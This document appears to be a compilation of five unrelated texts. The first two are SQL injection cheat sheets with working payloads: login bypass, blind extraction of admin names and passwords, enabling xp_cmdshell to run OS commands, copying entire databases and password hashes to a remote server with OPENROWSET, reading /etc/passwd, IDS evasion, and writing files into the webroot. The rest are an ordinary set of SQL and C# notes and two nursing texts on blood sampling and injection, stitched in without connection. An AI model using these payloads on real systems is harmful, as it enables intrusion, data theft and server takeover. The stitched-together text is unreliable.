第一篇：SQL注射技術總結文檔

天馬行空●狼技術小組[1.S.T ](http://www.tmdps.cn--------------

翻譯：浪跡天.Iceskysl@1.S.T

Iceskysl_At_www.tmdps.cn

1.Introduction.2.Testing for vulnerabilities.3.Gathering Information.4.Data types.5.Grabbing Passwords.6.Create DB accounts.7.MySQL OS Interaction.8.Server name and config.9.Retrieving VNC password from registry.10.IDS Signature Evasion.11.mySQL Input Validation Circumvention using Char().12.IDS Signature Evasion using comments.13.Strings without quotes.1.When a box only has port 80 open, it's almost certain the admin will patch his server, The best thing to turn to is web attacks.Sql Injection is one of the most common web attacks.You attack the web application,(ASP, JSP, PHP, CGI..etc)rather than the webserver or the services running on the OS.Sql injection is a way to trick using a qurey or command as a input via webpages，most websites take parameters from the user like username and passwrod or even their emails.They all use Sql querys.2.First of you should start with something simple.Pass:' or 1=1--' having 1=1--' SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablename')--' or 1 in(select @@version)--' and 1 in(select servername from master.sysservers)--

9.Retrieving VNC password from registry.-';declare @out binary(8)@rootkey = 'HKEY_LOCAL_MACHINE',@value_name='password',select cast(@out as bigint)as x into TEMP--' OR 'something' = 'some'+'thing'' OR 'something' like 'some%'' OR 'text' > 't'' OR 2 BETWEEN 1 and 3

11.mySQL Input Validation Circumvention using Char().Inject without quotes(string = “%”):--> ' or username like char(37);Inject with quotes(string=“root”):--> ' union select * from users where login = char(114,111,111,116);load files in unions(string = “/etc/passwd”):-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;Check for existing files(string = “n.ext”):-->' and 1=(if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

12.IDS Signature Evasion using comments.-->'/**/OR/**/1/**/=/**/1-->Username:' or 1/*-->Password:*/=1---->UNI/**/ON SEL/**/ECT-->(Oracle)

';EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'-->(MS SQL)

';EXEC('SEL' + 'ECT US' + 'ER')

13.Strings without quotes.--> INSERT INTO Users(Login, Password, Level)VALUES(char(0x70)+ char(0x65)+ char(0x74)+ char(0x65)+ char(0x72)+ char(0x70)+ char(0x65)+ char(0x74)+ char(0x65)+ char(0x72), 0x64)

Greets: kaneda, modem, wildcard, #black and pulltheplug.8

第二篇：SQL注射語句的經典總結

SQL注射語句的經典總結

SQL注射語句的經典總結 SQL注射語句

1.判斷有無注入點

';and 1=1 and 1=2

2.猜表一般的表的名稱無非是admin adminuser user pass password 等..and 0<>(select count(*)from *)

and 0<>(select count(*)from admin)---判斷是否存在admin這張表

3.猜帳號數目 如果遇到0< 返回正確頁面 1<返回錯誤頁面說明帳號數目就是1個

and 0<(select count(*)from admin)and 1<(select count(*)from admin)

4.猜解字段名稱 在len()括號里面加上我們想到的字段名稱.and 1=(select count(*)from admin where len(*)>0)--

and 1=(select count(*)from admin where len(用戶字段名稱name)>0)and 1=(select count(*)from admin where len(密碼字段名稱password)>0)

5.猜解各個字段的長度 猜解長度就是把>0變換 直到返回正確頁面為止

and 1=(select count(*)from admin where len(*)>0)

and 1=(select count(*)from admin where len(name)>6)錯誤

and 1=(select count(*)from admin where len(name)>5)正確 長度是6 and 1=(select count(*)from admin where len(name)=6)正確

and 1=(select count(*)from admin where len(password)>11)正確

and 1=(select count(*)from admin where len(password)>12)錯誤 長度是12 and 1=(select count(*)from admin where len(password)=12)正確

6.猜解字符

and 1=(select count(*)from admin where left(name,1)='a')---猜解用戶帳號的第一位

and 1=(select count(*)from admin where left(name,2)='ab')---猜解用戶帳號的第二位

就這樣一次加一個字符這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了

and 1=(select top 1 count(*)from Admin where Asc(mid(pass,5,1))=51)--這個查詢語句可以猜解中文的用戶和密碼.只要把后面的數字換成中文的ASSIC碼就OK.最后把結果再轉換成字符.看服務器打的補丁=出錯了打了SP4補丁

and 1=(select @@VERSION)--

看數據庫連接賬號的權限，返回正常，證明是服務器角色sysadmin權限。

and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--

判斷連接數據庫帳號。（采用SA賬號連接 返回正常=證明了連接賬號是SA）

and 'sa'=(Select System_user)--and user_name()='dbo'--and 0<>(select user_name()--看xp_cmdshell是否刪除

and 1=(Select count(*)FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')--

xp_cmdshell被刪除，恢復,支持絕對路徑的恢復

;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--;EXEC master.dbo.sp_addextendedproc

'xp_cmdshell','c:inetpubwww.tmdps.cn;Address=192.168.0.1,1433;', 'select * from table'

3.復制目標主機的整個數據庫insert所有遠程表到本地表。

基本語法：

insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1')select * from table2

這行語句將目標主機上table2表中的所有數據復制到遠程數據庫中的table1表中。實際運用中適當修改連接字符串的IP地址和端口，指向需要的地方，比如：

insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select

* from table1')select * from table2 insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases')

select * from master.dbo.sysdatabases

insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects')

select * from user_database.dbo.sysobjects insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns')

select * from user_database.dbo.syscolumns 復制數據庫：

insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select

* from table1')select * from database..table1 insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select

* from table2')select * from database..table2

復制哈西表（HASH）登錄密碼的hash存儲于sysxlogins中。方法如下：

insert into OPENROWSET('SQLOLEDB'，'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from

_sysxlogins')select * from database.dbo.sysxlogins 得到hash之后，就可以進行暴力破解。

遍歷目錄的方法： 先創建一個臨時表：temp

';create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

';insert temp exec master.dbo.xp_availablemedia;--獲得當前所有驅動器

';insert into temp(id)exec master.dbo.xp_subdirs 'c:';--獲得子目錄列表

';insert into temp(id,num1)exec master.dbo.xp_dirtree 'c:';--獲得所有子目錄的目錄樹結構,并寸入temp表中

';insert into temp(id)exec master.dbo.xp_cmdshell 'type c:webindex.asp';--查看某個文件的內容

';insert into temp(id)exec master.dbo.xp_cmdshell 'dir c:';--

';insert into temp(id)exec master.dbo.xp_cmdshell 'dir c: *.asp /s/a';--

';insert into temp(id)exec master.dbo.xp_cmdshell 'cscript C:InetpubAdminScriptsadsutil.vbs enum w3svc'

';insert into temp(id,num1)exec master.dbo.xp_dirtree 'c:';--（xp_dirtree適用權限PUBLIC）

寫入表：

語句1：and 1=(Select IS_SRVROLEMEMBER('sysadmin'));--語句2：and 1=(Select IS_SRVROLEMEMBER('serveradmin'));--

語句3：and 1=(Select IS_SRVROLEMEMBER('setupadmin'));--語句4：and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--語句5：and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--語句6：and 1=(Select IS_SRVROLEMEMBER('diskadmin'));--語句7：and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--語句8：and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--語句9：and 1=(Select IS_MEMBER('db_owner'));--把路徑寫到表中去：

;create table dirs(paths varchar(100), id int)--;insert dirs exec master.dbo.xp_dirtree 'c:'--and 0<>(select top 1 paths from dirs)--

and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))--;create table dirs1(paths varchar(100), id int)--;insert dirs exec master.dbo.xp_dirtree 'e:web'--and 0<>(select top 1 paths from dirs1)--把數據庫備份到網頁目錄：下載

;declare @a sysname;set @a=db_name();backup database @a to disk='e:webdown.bak';--

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85))T order by id desc)

and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1)from sysobjects)參看相關表。

and 1=(select user_id from USER_LOGIN)

and 0=(select user from USER_LOGIN where user>1)-=-wscript.shell example-=-declare @o int

exec sp_oacreate 'wscript.shell', @o out

exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

';declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--declare @o int, @f int, @t int, @ret int declare @line varchar(8000)

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'opentextfile', @f out, 'c:boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while(@ret = 0)begin print @line

exec @ret = sp_oamethod @f, 'readline', @line out end

declare @o int, @f int, @t int, @ret int

exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:inetpubwwwrootfoo.asp', 1

exec @ret = sp_oamethod @f, 'writeline', NULL, ''

declare @o int, @ret int

exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150

exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528

waitfor delay '00:00:05'

';declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--xp_dirtree適用權限PUBLIC exec master.dbo.xp_dirtree 'c:'

返回的信息有兩個字段subdirectory、depth。Subdirectory字段是字符型，depth字段是整形字段。

create table dirs(paths varchar(100), id int)

建表，這里建的表是和上面xp_dirtree相關連，字段相等、類型相同。

insert dirs exec master.dbo.xp_dirtree 'c:'

只要我們建表與存儲進程返回的字段相定義相等就能夠執行！達到寫表的效果,一步步達到我們想要的信息！

第三篇：SQL總結

1.SQL語句的With cte as用法：

with as短語，也叫做子查詢部分。即定義一個SQL片斷，該片斷會讓整個SQL語句所用到。eg：

with

cr as

(select CountryRegionCode from person.CountryRegion where Name like 'C%')

select * from person.StateProvince where CountryRegionCode in(select * from cr)

CTE后面必須直接跟使用CTE的SQL語句(如select,insert,update等)，否則，CTE將失效。CTE后面也可以跟其他的CTE，但只能使用一個with，多個CTE中間用逗號(,)分隔。eg：

with

cte1 as

(select * from table1 where name like 'abc%'),cte2 as

(select * from table2 where id > 20),cte3 as

(select * from table3 where price < 100)

select a.* from cte1 a, cte2 b, cte3 c where a.id = b.id and a.id = c.id

2.case when then多條件判斷：

CASE

WHEN 條件1 THEN 結果1

WHEN 條件2 THEN 結果2

WHEN 條件3 THEN 結果3

WHEN 條件4 THEN 結果4

.........WHEN 條件N THEN 結果N

ELSE 結果X

END

Case具有兩種格式。簡單Case函數和Case搜索函數。

--簡單Case函數

CASE sex

WHEN '1' THEN '男'

WHEN '2' THEN '女'

ELSE '其他' END

--Case搜索函數

CASE WHEN sex = '1' THEN '男'

WHEN sex = '2' THEN '女'

ELSE '其他' END

3.select語句前面加@轉義字符的作用是強制后面的字符串中不使用轉義字符，當作字符串

處理。

eg：string ss=@“aanaa”;輸出：aanaa

string ss=“aanaa”;

輸出：aa

aa

4.select getdate()：從SQL SERVER返回當前的時間與日期。

select first():函數返回指定的字段中第一個記錄的值。

select last():函數返回指定的字段中最后一個記錄的值。

select ucase():把字段的值轉換為大寫。

select lcase():把字段的值轉換為小寫。

select round():用于把數值字段設入為指定的小數位數。SELECT ROUND(column_name,decimals)FROM table_name

column_name 必需。要舍入的字段。decimals 必需。規定要返回的小數位數。format():用于對字段的顯示進行格式化。

SELECT ProductName, UnitPrice, FORMAT(Now(),'YYYY-MM-DD')as PerDate FROM Products

5.union與union all的區別：

對重復結果的處理，UNION ALL 會將每一筆符合條件的資料都列出來，無論資料值有無重復

6.SELECT INTO 語句從一個表中選取數據，然后把數據插入另一個表中。

SELECT INTO 語句常用于創建表的備份復件或者用于對記錄進行存檔。

將整個table1復制到table2中：

INSERT INTO SELECT語句

語句形式為：Insert into Table2(field1,field2,...)select value1,value2,...from Table1（要求目標表Table2必須存在，由于目標表Table2已經存在，所以我們除了插入源表Table1的字段外，還可以插入常量。）

SELECT INTO FROM語句

語句形式為：SELECT value1, value2 into Table2 from Table1（要求目標表Table2不存在，因為在插入時會自動創建表Table2，并將Table1中指定字段數據復制到Table2中）

7.nchar ：固定長度的 Unicode 數據，最大長度為 4,000 個字符。

nvarchar：可變長度Unicode 數據，其最大長度為4,000字符。

char: 固定長度的非 Unicode 字符數據，最大長度為 8,000 個字符。

varchar：可變長度的非Unicode數據，最長為8,000 個字符。

char和varchar都是字符串類型的，用Unicode編碼的字符串,結果是字符的整數值.8.select 1 from:

select 1 from mytable;與select anycol(目的表集合中的任意一行）from mytable;與select * from mytable 作用上來說是沒有差別的，都是查看是否有記錄，一般是作條件用的。select 1 from 中的1是一常量，查到的所有行的值都是它，但從效率上來說，1>anycol>*，因為不用查字典表。

查看記錄條數可以用select sum(1)from mytable;等價于select sum(*)from mytable;

9.SQL中的字符匹配：

[NOT] LIKE '<匹配串>' [ESCAPE '<換碼字符>']

<匹配串>可以是一個完整的字符串，也可以含有通配符%和_

%代表任意長度的字符串。eg：a%b表示以a開頭以b結尾的任意長度的字符串。_代表任意單個字符。eg：a_b表示以a開頭，以b結尾的長度為3的任意字符串。ESCAPE定義轉義字符，當轉義符置于通配符之前時，該通配符解釋為普通字符。

10.GROUP BY子句將查詢結果按某一列或多列的值分組，值相等的為一組。HAVING短語給出選擇組的條件。

11.ROW_NUMBER()OVER函數的基本用法 ：

row_number()OVER(PARTITION BY COL1 ORDER BY COL2)表示根據COL1分組，在分組內部根據 COL2排序，而此函數計算的值就表示每組內部排序后的順序編號（組內連續的唯一的)

select row_number()over(order by field2 desc)as row_number,* from t_table order by field1 desc Desc：倒序，Asc：正序

12.DbDataAdapter.Fill 方法(DataTable, IDbCommand, CommandBehavior)：

在DataTable中添加或刪除新行以匹配使用指定 DataTable 和 IDataReader 名稱的數據源中的行。

13.SqlCommand.ExecuteScalar 方法：執行查詢，并返回查詢所返回的結果集中第一行的第一列，忽略其他列或行。

14.inner join(等值連接)只返回兩個表中聯結字段相等的行

left join(左聯接)返回包括左表中的所有記錄和右表中聯結字段相等的記錄

right join(右聯接)返回包括右表中的所有記錄和左表中聯結字段相等的記錄

15.e.Item.ItemType==ListItemType.Item||e.Item.ItemType==ListItemType.AlternatingItem指觸發的類型為DadaList中的基本行或內容行

16.order by的用法：

如果Order by 中指定了表達式Nulls first則表示null值的記錄將排在最前(不管是asc 還是 desc)

如果Order by 中指定了表達式Nulls last則表示null值的記錄將排在最后(不管是asc 還是 desc)

eg：將nulls始終放在最前

select * from zl_cbqc order by cb_ld nulls first

--將nulls始終放在最后

select * from zl_cbqc order by cb_ld desc nulls last

單列升序：select from order by ;（默認升序，即使不寫ASC）

單列降序：select from order by desc;

多列升序：select , from order by , ;

多列降序：select , from order by desc, desc;

多列混合排序：select , from order by desc, asc;

17.C#中NULL,“",DBNULL,String.Empty,Convert.IsDBNull區別

(1)NULL

null 關鍵字是表示不引用任何對象的空引用的文字值。null 是引用類型變量的默認值。那么也只有引用型的變量可以為NULL，如果 int i=null,的話，是不可以的，因為Int是值類型的。

(2)DBNULL

DBNull在DotNet是單獨的一個類型,該類只能存在唯一的實例,DBNULL.Value,DBNull唯一作用是可以表示數據庫中的字符串，數字，或日期，為什么可以表示原因是DotNet儲存這些數據的類（DataRow等）都是以 object 的形式來儲存數據的。對于 DataRow , 它的 row[column] 返回的值永遠不為 null，要么就是具體的為column 的類型的值。要么就是 DBNull。所以 row[column].ToString()這個寫法永遠不會在ToString那里發生NullReferenceException。DBNull 實現了 IConvertible。但是，除了 ToString 是正常的外，其他的ToXXX都會拋出不能轉換的錯誤。

(3)”“和String.Empty

這兩個都是表示空字符串，其中有一個重點是string str1=”“ 和 string str2=null 的區別，這樣定義后，str1是一個空字符串，空字符串是一個特殊的字符串，只不過這個字符串的值為空，在內存中是有準確的指向的，string str2=null,這樣定義后，只是定義了一個string 類的引用，str2并沒有指向任何地方，在使用前如果不實例化的話，都將報錯。

(4)Convert.IsDBNull()

Convert.IsDBNull()返回有關指定對象是否為 DBNull 類型的指示,即是用來判斷對象是否為DBNULL的。其返回值是True或Flase。

string.Empty不分配存儲空間

”“分配一個長度為空的存儲空間

所以一般用string.Empty

null表示一個對象的指向無效，即該對象為空對象

DBNull。Value表示一個對象在數據庫中的值為空，或者說為初始化，DBNull。Value對象指向有效的對象

18.DataSet.Relations.add()：獲取用于將表鏈接起來并允許從父表瀏覽到子表的關系的集合。DataSet.Relations.Add(”關聯名稱“, 父關聯主鍵字段, 子關聯外來鍵字段)

19.DataBind():在Page_Load方法中我們建立了一個數組(ArrayList),并通過DataBind方法將這個數組捆綁到了DropDownList控件中，使得DropDownList最后有數據顯示：）

20.IN 操作符允許我們在 WHERE 子句中規定多個值。

SQL IN 語法:SELECT column_name(s)FROM table_nameWHERE column_name IN(value1,value2,...)

21.DataBinder.Eval方法:在運行時使用反射來分析和計算對象的數據綁定表達式<%# DataBinder.Eval(Container.DataItem, ”ColumnName“)%>

eval()函數可計算某個字符串，并執行其中的的 JavaScript 代碼。

可以理解為反射的綁定

或者理解為將Eval()里的字符串轉換為表達式

在數據綁定的時候常用，其實是通過反射的手段實現了綁定

22.sql語句 count(1)與 count(*)的區別 :

count(1)，其實就是計算一共有多少符合條件的行。

1并不是表示第一個字段，而是表示一個固定值。

其實就可以想成表中有這么一個字段，這個字段就是固定值1，count(1)，就是計算一共有多少個1.count(*)，執行時會把星號翻譯成字段的具體名字，效果也是一樣的，不過多了一個翻譯的動作，比固定值的方式效率稍微低一些。

23.DataTable.NewRow ：創建與該表具有相同框架的新的DataRow

24.ExcuteNonQuery():

如果要創建或修改數據庫結構，操作成功時返回值為-1；如果要更新記錄，返回值為操作影響的記錄數；

ExecuteNonQuery()方法主要用于用戶更新數據，通常它使用Update,Insert,Delete語句來操作數據庫，其方法返回值意義：對于 Update,Insert,Delete 語句 執行成功是返回值為該命令所影響的行數，如果影響的行數為0時返回的值為0，如果數據操作回滾得話返回值為-1，關于MyCommand的ExecuteNonQuery(),ExecuteScalar(),ExecuteReader方法的區別:

***ExecuteNonQuery():執行SQL，返回一個整型變量，如果SQL是對數據庫的記錄進行操作，那么返回操作影響的記錄條數，如果是SQL=”CREATE TABLE LookupCodes(code_id smallint IDENTITY(1,1)PRIMARY KEY CLUSTERED, code_desc varchar(50)NOT NULL)"那么在表創建成功后該方法返回-1。

***ExecuteScalar()：執行SQL，（如果SQL是查詢Select）返回查詢結果的第一行第一列，如果（如果SQL不是查詢Select）那么返回未實列化的對象，因為對象未實列化，所以返回結果不能ToString(),不能Equals(null)，也就是說返回結果沒有任何作用

***executeReader方法執行SQL，（如果SQL是查詢Select）返回查詢結果的集合，類型是 System.Data.OleDb.OleDbDataReader，你可以通過此結果，獲取查詢的數據。如果（如果SQL不是查詢Select）那么返回一個沒有任何數據的System.Data.OleDb.OleDbDataReader類型的集合(EOF)

25.DbDataAdapter.Fill 方法(DataTable)：在 DataSet 的指定范圍中添加或刷新行，以與使用 DataTable 名稱的數據源中的行匹配。

26.Decimal：decimal(2,1)，有效長度為2，小數位占1位。

varchar：可變長度的非Unicode數據，最長為8,000 個字符。

nvarchar：可變長度Unicode 數據，其最大長度為4,000字符。

char: 固定長度的非 Unicode 字符數據，最大長度為 8,000 個字符。

nchar ：固定長度的 Unicode 數據，最大長度為 4,000 個字符。

char和varchar都是字符串類型的，用Unicode編碼的字符串,結果是字符的整數值.timestamp:數據類型是一種特殊的數據類型，用來創建一個數據庫范圍內的唯一數碼。一個表中只能有一個timestamp列。每次插入或修改一行時，timestamp列的值都會改變。盡管它的名字中有“time”，但timestamp列不是人們可識別的日期。在一個數據庫里,timestamp值是唯一的Uniqueidentifier特殊數據型

SELECT UPPER('Kelly'):upper是數據庫的字符串函數，它的作用是將傳遞給它的英文字符串中小寫字母轉換為大寫（大寫的保持不變）；

SELECT LOWER('kelly'):lower將指定字符串中的大寫字母換成小寫字母

SUBSTRING（colunm name,startposition,length）從指定字符串中取字符

eg:SQL實例：

顯示每個地區的總人口數和總面積．

SELECT region, SUM(population), SUM(area)

FROM bbc

GROUP BY region

先以region把返回記錄分成多個組，這就是GROUP BY的字面含義。分完組后，然后用聚合函數對每組中的不同字段（一或多條記錄）作運算。

顯示每個地區的總人口數和總面積．僅顯示那些面積超過1000000的地區。

SELECT region, SUM(population), SUM(area)

FROM bbc

GROUP BY region

HAVING SUM(area)>1000000

27.SELECT [ALL|DISTINCT] <目標列表達式> [別名] [，<目標列表達式> [別名]]…… FROM <表名或視圖名> [別名] [,<表名或視圖名> [別名]]……

[WHERE <條件表達式>]

[GROUP BY <列名1> [HAVING <條件表達式>]]

[ORDER BY <列名2> [ASC|DESC]]

INSERT

INTO <表名> [(<屬性列1>[,<屬性列2>……])]

VALUES(<常量1> [,<常量2>]……)

UPDATE <表名>

SET <列名>=<表達式> [,<列名>=<表達式>]……

[WHERE <條件>]

DELETE

FROM <表名>

[WHERE <條件>]

第四篇：皮內注射技術試題

采血技術操作試題

一、填空題（2分/空 共50分）

1.靜脈采血法目前包括（）和（）兩種?？赡馨l生的并發癥包括()()()()()2.掌握正確的穿刺方右手持注射器，針頭和皮膚成（）或（），在股動脈內側（）處刺入，見抽出暗紅血液，表示已達股靜脈。

3.評估血管條件，盡量選擇（）（）（）淺表靜脈。4.采血前應評估患者（）（）（）（）等。5.采血后有效按壓是（）的有效措施。

6.動脈前認真選擇血管，避免在已出現（）（）（）（）等情況的部位穿刺。

7.動脈穿刺采血法操作主要用于（）.8.動脈穿刺采血操作已經成為護士必須熟練掌握的臨床護理技術，但該操作需要較高的技術，操作不當，會造成諸多不良后果，如()（）（）（）（）（）（）（）等。

二、選擇題（5分/題 共50分）

1、靜脈穿刺是實驗室試驗獲取（）樣本的主要技術和方法 A體液 B血液 C 腦脊液 D尿液

2.采血對象取坐位或臥位，手臂伸直平放在床邊或臺面，腕下墊枕上，暴露穿 刺部位，找好合適采血靜脈后，在靜脈穿刺部位上方4-7厘米處扎緊壓脈帶，捆綁時間不應超過（A）A 1分 B 2分 C 3分 D 4分

3.當輕壓或輕拍時能感覺其回彈的靜脈即為合適血管。最常用的選擇部位是 血管豐富并且血管貼近皮膚表層的（D）

A上臂區域 B 上肢區域 C 肘后區域 D 肘前區域

4.使針與皮膚成（），在靜脈上或旁側刺入皮下，再沿靜脈走向 潛行刺入靜脈，待回血后，將針頭順勢探入少許固定不動，以免采血時針頭滑出,但不可用力深刺，以免造成血腫。

A l5度一30度 B 15-20度 C 20-30度 D30-40度

5.抽血至所需量，放松壓脈帶，用無菌棉簽壓住進針處拔針，將采樣對象前臂 屈曲壓迫(3-5分鐘)A 1-2分鐘 B 2-4分鐘 C 3-5分鐘 D 4-6分鐘 6.采血后發生暈厥或眩暈，可讓其（平臥）休息片刻，即可恢復。A平臥 B坐臥 C斜臥 D 站立 7.血氣分析時，標本的采集處理中，以下做法錯誤的是（）

A．采集動脈血 B．以肝素抗凝 C．立即送檢 D．不需與空氣隔絕 E．抽血后將針頭刺入膠塞搖勻血液 8.股動脈位于（）

A．股三角內由髂外動脈發出 B ．股神經外側 C．股靜脈內側 D．股靜脈外側 E．股深動脈內側

9.動脈采血技術用于（）

A．交叉配血

B．血常規 C．血氣分析 D．血生化 10.采集動脈血穿刺針頭斜面最佳穿刺角度是（）

A.向上與皮膚呈45度-90度 B向下與皮膚呈45度-90度 C.向上與皮膚呈60度 D向上與皮膚呈30度 E。向上與皮膚呈15度

第五篇：靜脈采血與注射技術

靜脈采血與注射技術

概念：

自靜脈抽取血標本或注入藥液的方法 常用靜脈：

1、四肢淺靜脈：上肢常用肘部淺靜脈（貴要靜脈、肘正中靜脈、頭靜脈）腕部及手背靜脈，下肢常用大隱靜脈、小隱靜脈及足背靜脈

2、頭皮靜脈 3：股靜脈

靜脈采血技術 目的：

為患者采集，留取靜脈血標本，協助臨床診斷疾病，為臨床治療提供依據 血標本分為：

1、全血標本：測定血沉及血液中某些物質如血糖、尿素氮、肌酐、尿酸、肌酸、血氨的含量。

2、血清標本：測定肝功能、血清酶、脂類、電解質等。

3、血培養標本：培養檢測血液中的病原菌。操作前準備階段

?

1、衣帽整齊、規范洗手、戴口罩；

?

2、用物：治療車、清潔治療盤、棉簽、皮膚消毒液、手消毒液、止血帶、彎盤、手套，根據醫囑備注射器、標本容器、利器盒、試管架、小墊巾；

?

3、核對檢驗單、標本容器，貼化驗單附聯標簽，按要求填寫各項內容，檢查標本容器是否完好；

?

4、將物品按順序置于治療車上。操作步驟階段

1、將用物推至患者床旁，核對床號、姓名、并詢問患者的名字，向患者說明目的及配合方法，詢問患者是否按要求進行采血前準備；

2、再次核對檢驗單，并協助患者取舒適臥位；

3、選擇合適的穿刺部位，評估穿刺部位皮膚及血管情況并征求患者意見，鋪小墊巾，放好止血帶，進行手消毒；

4、消毒皮膚、扎止血帶，再次消毒皮膚，囑患者握拳；

5、戴手套，按靜脈穿刺法穿刺血管，見回血后抽取所需血量，松止血帶，囑患者松手，迅速拔出針頭、用干棉簽囑患者按壓局部3~5min、勿揉搓

；

6、取下針頭，跟據檢查目的將血液沿管壁注入標本容器，脫去手套；

7、再次核對，協助患者取舒適臥位，整理用物并致謝，規范洗手；

8、標本連同檢驗單及時送檢；

9、必要時記錄抽血時間、抽血量。注意事項

?

1、血標本做生化檢驗時，應在病人空腹時采取，此時血液的各種化學成分處于相對穩定狀態，檢驗結果比較 準確。因此，應事先通知病人，避免因進食水而影響檢驗結果。

?

2、根據不同的檢驗目的選擇標本容器，并計算所需血量。一般血培養取血3～5ml，亞急性細菌性心內膜炎病人為提高陽性培養率，采血量需增至10～15ml。?

3、嚴禁在輸液、輸血的針頭處取血，以免影響檢驗結果應在對側肢體采集。

?

4、同時抽取幾項檢驗標本，一般注入容器的順序為：血培養瓶→抗凝管→干燥管，動作應迅速準確。

?

5、血培養標本應注入無菌容器內，不可混入消毒劑、防腐劑及藥物，以免影響檢驗結果。

靜脈注射技術 目的

1、注入藥物，用于藥物不宜口服、皮下、肌內注射，或需迅速發揮藥效時。

2、注入藥物作某些診斷性檢查。

3、靜脈營養治療。

操作前準備階段

? 護士：洗手，戴口罩，檢查并核對藥物、醫囑，按醫囑準備藥液。

? 物品：治療盤，注射器(根據藥量準備)、頭皮針、藥液、止血帶、輸液貼、治療巾、消毒墊巾、消毒液等。? 環境：清潔、舒適。? 病人：坐位或臥位。操作步驟階段 治療室：

?

1、核對醫囑，準備及檢查藥液，檢查無菌物品。

?

2、消毒瓶蓋二次(安瓿鋸前后各消毒1次)，打開安瓿，取出注射器抽吸藥液(劑量準確)。

?

3、放入治療盤中備用。病房：

?

1、攜用物至床旁，核對后向病人解釋操作的目的，方法及所注藥物及作用。?

2、暴露肢體，扎止血帶選擇血管后，松開止血帶，在預穿刺血管的下面放消毒墊巾。?

3、消毒皮膚一次，皮膚待干,撕開輸液貼貼在治療盤上，扎止血帶(在穿刺部位上方約6cm處扎緊)，再次消毒皮膚，囑病人握拳使靜脈充盈。?

4、排盡注射器內空氣。?

5、再次核對。

?

6、左手繃緊皮膚，右手持注射器，針頭斜面向上進針(與皮膚呈20-30度角)，見回血沿血管進針少許，松止血帶并囑病人松拳。

?

7、固定針栓緩慢注入藥液，同時觀察病人有無不良反應，(注射過程中，可稍抽回血以觀察針頭有無脫出血管)。

?

8、注射完畢拔針，按壓注射部位與進針點。?

9、再次查對。

注意事項

1、嚴格執行查對制度和無菌操作制度。

2、對需要長期靜脈給藥的患者，應當保護血管，由遠心端至近心端選擇血管穿刺。

3、注射過程中隨時觀察患者的放應。

4、靜脈注射對組織有強烈刺激性的藥物，一定要在確認針頭在靜脈內后方可推注藥液，以免藥液外溢導致組織壞死。靜脈注射失敗的常見原因

1、針頭刺入靜脈過少，抽吸雖有回血，但松解止血帶時靜脈回縮，針頭滑出血管，藥液注入皮下。

2、針頭斜面未完全刺入靜脈，部分在血管外，抽吸雖有回血，但推注時藥液溢至皮下，局部隆起并有痛感。

3、針頭刺入較深，斜面一半穿破對側血管壁，抽吸有回血，推注少量藥液，局部可無隆起，但因部分藥液溢出至深層組織，患者有痛感。

4、針頭刺入過深，穿破對側血管壁，抽吸無回血。